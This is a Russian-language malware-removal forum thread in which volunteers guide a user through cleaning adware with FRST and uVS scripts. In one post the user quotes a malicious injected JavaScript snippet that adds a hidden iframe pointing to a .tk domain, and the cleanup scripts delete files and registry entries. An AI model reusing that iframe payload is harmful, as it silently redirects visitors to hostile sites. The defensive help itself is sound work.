Перейти к содержанию

Не удается удалить вирус типа POP.Optional.Legacy


kotwi

Рекомендуемые сообщения

  • Ответов 35
  • Created
  • Последний ответ

Top Posters In This Topic

  • kotwi

    18

  • thyrex

    10

  • regist

    8

Синхронизация отключается только в настройках браузера. Для этого браузер придется запускать

Это понятно. Синхронизации нет и быть не может, я не производил ВХОД.

В Хроме заблокировал "Фоновую синхронизацию" - толку нет.

 

Вопросы моего поста №13 остаются актуальными.

Ссылка на комментарий
Поделиться на другие сайты

1. Откройте Блокнот и скопируйте в него приведенный ниже текст

CreateRestorePoint:
CHR DefaultSuggestURL: Default -> hxxps://suggest.yandex.net/suggest-ff.cgi?uil=ru&part={searchTerms}
C:\Users\123\AppData\Local\Google\Chrome\User Data\Default\Extensions\odijcgafkhpobjlnfdgiacpdenpmbgme
C:\Users\123\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmpoaahleccaibbhfjfimigepmfmmbbk
CHR HKLM\...\Chrome\Extension: [bejnpnkhfgfkcpgikiinojlmdcjimobi] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [dkekdlkmdpipihonapoleopfekmapadh] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
2016-12-24 12:30 - 2016-07-01 14:23 - 002187992 _____ (Mail.Ru) C:\Users\123\AppData\Local\Temp\2177-5628-bde1-cbfd.exe
2016-12-15 11:06 - 2016-12-15 11:06 - 002458672 _____ (The OpenSSL Project, http://www.openssl.org/) C:\Users\123\AppData\Local\Temp\libeay32.dll
2015-02-23 19:07 - 2015-02-23 19:07 - 003458280 _____ () C:\Users\123\AppData\Local\Temp\mailruhomesearchvbm.exe
2015-02-23 20:35 - 2015-02-23 20:36 - 000543168 _____ () C:\Users\123\AppData\Local\Temp\masauto_runxx.dl.dll
2015-02-23 19:22 - 2015-02-23 19:22 - 000518592 _____ () C:\Users\123\AppData\Local\Temp\masblog_runxx.dl.dll
2015-02-23 19:21 - 2015-02-23 20:35 - 000506304 _____ (TODO: <Company name>) C:\Users\123\AppData\Local\Temp\masflag_runxx.dl.dll
2016-12-12 01:14 - 2016-10-21 17:22 - 004157656 _____ (Mail.Ru) C:\Users\123\AppData\Local\Temp\mrutmp.exe
2016-12-15 11:06 - 2016-12-15 11:06 - 000970912 _____ (Microsoft Corporation) C:\Users\123\AppData\Local\Temp\msvcr120.dll
2015-02-23 19:20 - 2015-02-23 19:21 - 001304512 _____ () C:\Users\123\AppData\Local\Temp\QYAgent_runxx.dl.dll
MSCONFIG\startupreg: GoogleChromeAutoLaunch_E9B5D4249CCEA13E75406E6F6F1B4400 => "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
Reboot:
2. Нажмите ФайлСохранить как

3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool

4. Укажите Тип файлаВсе файлы (*.*)

5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить

6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.
Ссылка на комментарий
Поделиться на другие сайты

Логи приложил.

Реклама также вылазиет периодически, но теперь ADWCleaner находит всего 1 единственную угрозу (до этого 2 находил) после пользования браузером, а после перезагрузки и чистки ADWCleaner-ом обнарживается тоже также 1 угроза.


Дополню:

 

Открываю сайт aliexpress.com, в IE файл предлагает сохранить, в mozilla пишет следующее:

var tmpexo2 = document.createElement('div');tmpexo2.setAttribute("align","center");tmpexo2.innerHTML = '<iframe src="http://tdsdomains.tk/j78Wnr" frameborder=0 width=0 height=0 style="display:none;"></iframe>';var iframeexo2 = tmpexo2.firstChild;var bodyexo2 = document.getElementsByTagName('body')[0];bodyexo2.insertBefore(tmpexo2, bodyexo2.firstChild);

И не открывает.

AdwCleanerS14.txt

AdwCleanerC12.txt

Ссылка на комментарий
Поделиться на другие сайты

ADWCleaner находит PUP.Optional.Legacy все равно.

 

Я думаю, дело может в каком либо процессе, ведь странно - почему вместо открытия aliexpress выдается какой то код?

Изменено пользователем kotwi
Ссылка на комментарий
Поделиться на другие сайты

Скачайте AutorunsVTchecker. Распакуйте и запустите. Не дожидаясь окончания сканирования,      

  1. Скачайте Universal Virus Sniffer (uVS)
  2. Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.

    !!!Внимание.
    Если у вас установлены архиваторы
    WinRAR
    или
    7-Zip
    , то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

  4. Дождитесь окончания работы программы и прикрепите лог к посту в теме.

    !!! Обратите внимание
    , что утилиты необходимо запускать от имени Администратора. По умолчанию в
    Windows XP
    так и есть. В
    Windows Vista
    и
    Windows 7
    администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать
    Запуск от имени Администратора
    , при необходимости укажите пароль администратора и нажмите
    "Да"
    .



 

Ссылка на комментарий
Поделиться на другие сайты

1) AdwCleaner у вас скачан с фейкогового сайта :angry:

www.adwcleaner.ru/

Это фейк пытающийся заработать на имени известной утилиты, а ссылка для скачивания с официального сайта https://toolslib.net/downloads/finish/1/

Деинсталируйте установленный у вас AdwCleaner.

 

2) Удалите остатки Comodo по инструкции отсюда.

 

3)

  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    ;uVS v4.0.11 [http://dsrt.dyndns.org]
    ;Target OS: NTv6.1
    v400c
    BREG
    ;---------command-block---------
    zoo %SystemDrive%\PROGRAM FILES\TENCENT\QQPCMGR\10.5.15816.217\QMTRAYPLUGIN\QMMOBILETRAYPLUGIN\ANDROIDPOPUP.EXE
    delall %SystemDrive%\PROGRAM FILES\TENCENT\QQPCMGR\10.5.15816.217\QMTRAYPLUGIN\QMMOBILETRAYPLUGIN\ANDROIDPOPUP.EXE
    zoo %SystemDrive%\USERS\123\APPDATA\LOCAL\TEMP\{31EC0859-90B7-489E-BDC2-A8A19D4F9BC8}-51.0.2704.103_50.0.2661.102_CHROME_UPDATER.EXE
    delall %SystemDrive%\USERS\123\APPDATA\LOCAL\TEMP\{31EC0859-90B7-489E-BDC2-A8A19D4F9BC8}-51.0.2704.103_50.0.2661.102_CHROME_UPDATER.EXE
    delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL
    delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL
    delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.5\PSMACHINE.DLL
    delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.30.3\PSMACHINE.DLL
    delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.1\PSMACHINE.DLL
    delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
    delref %SystemDrive%\PROGRAM FILES\COMODO\COMODO INTERNET SECURITY\CMDAGENT.EXE
    delref 83.149.99.201,8.8.8.8\DNS SERVER LIST
    delref {8AD9C840-044E-11D1-B3E9-00805F499D93}\[CLSID]
    delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
    delref {0C4CC089-D306-440D-9772-464E226F6539}\[CLSID]
    delref {05EB6920-D8AD-4350-BEF1-4F7107F70431}\[CLSID]
    apply
    
    regt 27
    deltmp
    czoo
    restart
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.

 

4) Проверьте проблему.

Ссылка на комментарий
Поделиться на другие сайты

Все сделал как сказали:

1. Удалил фейковый ADWCleaner

2. Поставил настоящий.

3. Скачал программу удаления остатков КОМОДО, но там в списке не было наименования "Комодо антивирус", поэтому выбрал первое в списке - "КОмодо I. S."

4. Выполнил скрипт, после перезагрузки проблема осталась - при клике на какую-либо ссылку (не всегда) открывает старое.

При открытии алиэкспресс пишет код.

 

ADWCleaner кстати, находит 2 проблемы - это тот же PUP. После чистки официальным ADWCleaner и перезагрузки, пишет - обнаружено угроз: 2, удалено угроз: 1. Одну так и не смог удалить, чтоли.

Если нужны скрины или еще что-то, то говорите.

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • Zakhar62668
      От Zakhar62668
      Виндоус дефендер находит постоянно трояны, но удалить не может, также пытался установить разные антивирусы, но все они не запускаются, вылетают ошибки, а также в исключениях есть файлы, которые не удаляются. Сейчас, посмотрев форум, запустил компьютер в безопасном режиме и через флешку установил фарбар рекавери скан тулс(чтоб запустить его пришлось удалить ограничения в редакторе реестра)
    • Эльнар
      От Эльнар
      Здравствуйте! Помогите пожалуйста удалить вирус, скорее всего майнер. Он постоянно нагружает процессор, даже на рабочем столе. Как только открываю диспетчер задач, обороты вентиляторов процессора падают до нормального. Как только выхожу из диспетчера задач сразу обороты вентиляторов растут. При открытии диспетчера задач я не успеваю увидеть какой процесс нагружает компьютер. Эта проблема началась когда я установил программу видеомонтажа Magix Vegas Pro не с официального сайта. Так же из проблем не получается зайти в конфигурацию системы (msconfig), окошко сразу закрывается. При запуске антивируса Malwarebytes, он тоже сразу закрывается. Когда зашёл в систему через безопасную загрузку msconfig также не открывается, но удалось запустить malwarebytes и drweb, они нашли вирусы, но проблема не ушла. Запустил Kaspersky Removal Tool, он долго сканировал и нашёл вирусы. Один из них располагался в папке куда был установлен Magix Vegas Pro. После удаления вирусов ситуация к сожалению не изменилась. Приложил отчёт сборщика логов.
      CollectionLog-2024.12.02-15.07.zip
    • Luxory
      От Luxory
      то ли после скачивания программы или чего-то ещё. у меня стал шуметь ноутбук в простых задачах. для большего понимания вот мои характеристики: Lenovo LegionY540-15irh i7-9750HF / GTX 1660Ti/ Windows 10 pro / он стал шуметь в простых задачах от нагрузки. которая появлялась из неоткуда. как открываю диспетчер задач. нагрузка на процессор сразу же падает до 0-5 процентов. а в играх нагрузка добавляется на 20-30 процентов. перестали открываться такие приложения как (реестр. msi afterbutner. msconfig.) и иногда во время игры открывается командная строка на миллисекунду каждые 10 секунд. что очень мешает. проводил проверки разными антивирусами. вирусы нашёл только KVRT и Malware. но они нашли всякие трояны и рекламные вирусы. т.е. мне с моей проблемой не помогли. пробовал отключать задачи в планировщике. не помогло. пробовал в командной строке 2 проверки для восстановления чего-то. они помогли лишь на время. потом снова начала вылезать командная строка в играх. первые 10 минут игры всё нормально. и после первого открытия командной строки они уже выскакивает каждые 10 секунд и исчезает. многие жаловались на процесс sihost.exe но я его пробовал отключать. так же безрезультатно. не знаю что делать. может быть проще будет переустановить ОС?
    • meowqqq
      От meowqqq
      Несколько раз находил этот вирус на своем компьютер удалял но он все ровно устанавливался 
      file:///C:/Users/short/Downloads/cureit(4280).log
       
    • LeoWels
      От LeoWels
      Этот вирус давно уже в системе не могу никак избавиться от него Касперский находит его но не может удалить после выполнения лечения система уходит в перезагрузку 
      CollectionLog-2024.12.28-16.07.zip

×
×
  • Создать...